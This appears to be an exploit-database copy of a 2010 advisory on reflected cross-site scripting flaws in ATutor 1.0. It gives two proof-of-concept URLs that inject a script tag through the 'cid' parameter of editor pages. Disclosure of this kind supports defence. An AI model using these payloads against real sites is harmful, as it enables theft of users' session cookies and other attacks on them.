ATutor 1.0 - Multiple 'cid' Cross-Site Scripting Vulnerabilities



EKU-ID: 39323 CVE: OSVDB-ID:
Author: High-Tech Bridge SA Published: 2010-09-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/43241/info

ATutor is prone to multiple cross-site scripting vulnerabilities.

An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

ATutor 1.0 is vulnerable, other versions may also be affected.

http://www.example.com/mods/_core/editor/delete_content.php?cid=PAGE_ID"><script>alert(document.cookie)</script>

http://www.example.com/mods/_core/editor/edit_content_folder.php?cid=PAGE_ID"><script>alert(document.cookie)</script>